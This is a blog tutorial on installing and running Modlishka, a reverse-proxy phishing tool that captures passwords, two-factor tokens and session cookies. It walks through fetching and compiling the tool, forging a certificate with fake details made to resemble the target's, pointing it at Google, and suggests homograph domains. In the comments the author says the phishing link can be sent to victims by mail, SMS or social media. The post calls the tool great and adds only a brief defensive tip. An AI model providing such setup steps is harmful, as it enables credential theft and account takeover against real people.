Modlishka -- Advanced Phishing | Bypass Two Factor Authentication

We all try to secure our all online accounts and social media accounts and we turn on the Two-Factor Authentication or Two-Step Verification. Then we think that we are now safe. Sometimes we check a phishing page with wrong password. But Modlishka can bypass Two-factor authentication (2FA).

What is Modlishka?


Modlishka, a reverse proxy automated advanced phishing tool which is written in Go language.It is called the most powerful and ferocious phishing tool ever created. This tool can perform advance level of phishing. Modlishka can easily bypass two factor authentication running on Gmail, YahooMail, RadiffMail, Facebook etc and catch the credentials like username, password, two factor authentication token.



The best thing of Modlishka is this tool doesn't require any saved phishing page or templates to perform phishing. It uses reverse proxy to open the website live.

How Modlishka Works?


Modlishka works on both social engineering and MITM (Man-In-The-Middle) attack technique. Modlishka server stays between the target website and victim and act like a proxy for victim. The requests are sending from victim and target website passes through Modlishka server. Just like the following picture:



That's why Modlishka can easily grab the username and passwords given by user and the authentication token it also can capture the sessions and cookies between user and website. Attacker can also use them to make web session.
In this process user will not even realize for a moment that the account was stolen. That's why Modlishka is a very dangerous tool.

Modlishka is very easy to set up that makes this tool more dangerous. To be safe from this tool we need to check the link we are clicking very carefully, and it will use third party SSL certificate, supose some one send a phishing link of Gmail using Modlishka then this phishing site will not have Google's SSL certificate.
Be aware and try to not click in any links.

How to Set up Modlishka in Kali Linux


This tool is written in Golang. We need to install Golang in our Kali Linux system. Apply the following command in terminal.


apt-get install golang

 The screenshot is following:


After installing Golang we need to set our GOPATH, this is just like we set path for Java. We will do this using following command:

export GOPATH=$HOME/go
The screenshot is following


Let we check that our path 'go' is set in the root directory or not, to check this we type following command:

echo $GOPATH

The screenshot is below:


We can see in the screenshot that or go directory is under the root directory. Yes it's perfect.

After setting the path we need to download Modlishka from Github to do this we are going to use following command:

go get -u github.com/drk1wi/Modlishka
Remember that we didn't use https or www before the github link and this command will not show how much percentage we downloaded it will download total tool, we need to wait some time here the screenshot is following:


Then we need to go to the downloaded folder by using the command:

cd root/go/src/github.com/drk1wi/Modlishka
The output of the command is below



Now we can compile Modlishka but before compile this we generate the SSL certificate , here we configure in local host but we also can use our registered domain (Homograph will better ) and SSL certificate here.

First of all we generate a RSA private key by applying following command:

openssl genrsa -out MyCA.key 2048
We can use any name of the key file.

Here is the screenshot of the command:


In the next we are going to generate SSL certificate. The command is following:

openssl req -x509 -new -nodes -key MyCA.key -sha256 -days 1024 -out MyCA.pem
The screenshot is following.


In the information field section we can use any fake information. Feel this looks like target domains SSL information.

Now we can check our SSL certificate and key using ls command:

ls
The following screenshot shows us the key file(MyCA.key) and the certificate(MyCA.pem):


Now we open the key file in leafpad using following command:

leafpad MyCA.key
And copy the whole text then close it, we use Ctrl+A to select all and Ctrl+C to copy the whole thing.

After copy the key we need to paste it in autocert.go file in plugin directory
open this with leafpad text editor applying following command:

leafpad plugin/autocert.go



Paste the key in in the place of the PASTE_YOUR_CA_CERT_KEY_HERE. We will remember that our key will inside of  '  '. See following screenshot:


Save and close it and then we will copy and paste our SSL certificate. Use following command to copy the certificate.

leafpad MyCA.pem
The screenshot is following:

We will copy the whole thing and paste in the autocert.go file. Let's again open the file in leafpad text editor by using following command:

leafpad plugin/autocert.go
Then paste it in the place of PASTE_YOUR_CA_CERT_HERE . The screenshot is following:
Save and close autocert.go file.

Yah we all set up now we are going to compile Modlishka using following command.

make
If we did everything well then it will look like following screenshot.

Now we can check the options by applying the command

./dist/proxy -h
The screenshot of the command is below

Then we configure a target website for phishing. By default Modlishka use google's domain as target. Use the command to change target domain.

nano templates/google.com_gsuite.json
The screenshot of the command is below:

Before running Modlishka we need to import our custom SSL certificates in our browser. If we use registered domain then we don't need to do this cause in that case we use original SSL certificate.

So open firefox web browser and go to

Prefernces > Advanced > Certificates > View Cretificates > Import



The select the MyCA.pem file in the directory root/go/src/github.com/drk1wi/Modlishka

The screenshot is following:


Now we are all set to start Modlishka server. We did not changed the configuration file so we start using following command :

./dist/proxy -config templates/google.com_gsuite.json

Then the tool will be started in our localhost. The screenshot of Modlishka is following :

Modlishka is started now go to firefox browser and we go to the https://www.loopback.modlishka.io and this will open Google.com in live mode.



Now go to log in page and try to log in with fake password or 2 factor authenticate.


This is a grate tool, isn't it ? Write your thoughts in the comment section. Thanks for read this.
Modlishka -- Advanced Phishing | Bypass Two Factor Authentication Modlishka -- Advanced Phishing | Bypass Two Factor Authentication Reviewed by Kali Linux on April 15, 2019 Rating: 5

11 comments:

  1. Nice post,it helps me alot,keep it up !!

    ReplyDelete
  2. Wow....really working tutorial

    ReplyDelete
  3. yah..its a grate tool.. thanks for this info

    ReplyDelete
  4. Como realizo la configuración para enviar el link al usuario final?

    Cual seria el link a enviar?

    ReplyDelete
    Replies
    1. Gracias por tu valioso comentario. Si está utilizando WAN con un dominio registrado y certificados SSL, puede enviar el enlace a cualquier formulario, como correo o SMS o redes sociales. He discutido algunas buenas técnicas en el último de este post. lea todo (lo siento, no sé español, escribí esto con la ayuda del traductor de Google)

      Delete
  5. Por favor explicar cual seria el link para enviar para enviar por correo ?

    ReplyDelete
    Replies
    1. Gracias por tu valioso comentario maestro. En este tutorial usé una conexión LAN, lo que significa que solo funciona para aquellos que se conectaron a nuestra red. ¿Cómo enviar el enlace? oh simplemente sms

      Delete

Powered by Blogger.